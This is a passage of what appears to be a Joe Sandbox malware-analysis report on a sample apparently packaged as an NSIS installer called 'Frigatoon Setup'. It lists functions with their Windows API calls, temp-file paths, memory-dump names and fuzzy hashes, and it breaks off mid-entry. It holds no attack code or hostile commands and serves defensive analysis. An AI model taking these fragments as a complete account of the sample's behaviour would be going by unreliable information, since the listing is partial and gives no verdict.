GlobalAlloc.KERNEL32(00000040,00042C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
Opcode Fuzzy Hash: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98

Function 70021837 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 70021893
GlobalFree.KERNEL32(?), ref: 70021A2A
GlobalFree.KERNEL32(?), ref: 70021A2F

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
Instruction ID: 127549feec88d67223c87326f53f2ec0c5383ce26c55aed568ab727de9e7750c
Opcode Fuzzy Hash: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
Instruction Fuzzy Hash: 5E51E832D04154AEDB129FB4FC546EEBBFBAB68A77F24005AE407A3305C6316D818752

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
Opcode Fuzzy Hash: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58

Function 00401DFF Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
Opcode Fuzzy Hash: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18

Function 004048C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
wsprintfA.USER32 ref: 0040496A
SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

%u.%u%s%s, xrefs: 0040494C

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
Opcode Fuzzy Hash: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8

Function 0040243D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402488
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004024C5
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9

Strings

C:\Users\user\AppData\Local\Temp\nsx6761.tmp, xrefs: 00402479, 0040249B, 004024AF, 004024BA

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp
API String ID: 2655323295-2667555261
Opcode ID: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
Instruction ID: d7f14aed55912e39ad141723e2cbb786b74cb62cb57f73557c42781e6368b2a7
Opcode Fuzzy Hash: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
Instruction Fuzzy Hash: BC119071E00218BEEB01EFA58E49EAE7BB5EB48314F21443BF504B72C1C6F85D419A18

Function 00405A73 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AC6
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00405AD6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A73
C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 00405A79, 00405A7E, 00405A84, 00405ABF, 00405AC5, 00405ACD, 00405AD5

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
API String ID: 3248276644-3824364320
Opcode ID: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
Opcode Fuzzy Hash: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE

Function 00405985 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040598B
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 00405994
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 004059A5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405985

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction ID: 19b991fbecd43d68fcf8fbe3975c191da3a7c8eaa4a3e5077e024cb3b188d11e
Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction Fuzzy Hash: 8DD0A7A21059306AE20266159C09DDB19088F12315B060027F101B2191C63C0D1187FE

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
Opcode Fuzzy Hash: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8

Function 00405A1E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
CharNextA.USER32(00000000), ref: 00405A31
CharNextA.USER32(00000000), ref: 00405A45

Strings

C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 00405A1F

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
API String ID: 3213498283-1184143763
Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA

Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
GetTickCount.KERNEL32 ref: 00402D91
CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
ShowWindow.USER32(00000000,00000005), ref: 00402DBC

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
